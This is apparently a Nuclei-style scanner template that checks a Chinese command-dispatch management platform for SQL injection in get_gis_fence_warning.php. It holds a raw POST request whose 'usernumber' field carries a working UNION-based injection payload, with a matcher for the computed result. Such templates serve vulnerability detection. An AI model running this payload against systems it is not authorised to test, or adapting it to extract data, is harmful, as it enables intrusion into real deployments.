id: command-dispatch-get-gis-fence-warning-sqli

info:
  name: 指挥调度管理平台 get_gis_fence_warning.php - SQL Injection
  author: qwtd
  severity: high
  tags: 指挥调度管理平台



http:
  - raw:
      - |              
        POST /api/client/get_gis_fence_warning.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Cookie: PHPSESSID=7d1e1db182a16e0508fda0961e9a0f6d
        Upgrade-Insecure-Requests: 1
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 138

        usernumber=1' UNION ALL SELECT NULL,NULL,CONCAT(0x7162707a71,IFNULL(CAST(111*111 AS CHAR),0x20),0x7162707671),NULL,NULL,NULL,NULL,NULL-- -


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '12321'

      - type: status
        status:
          - 200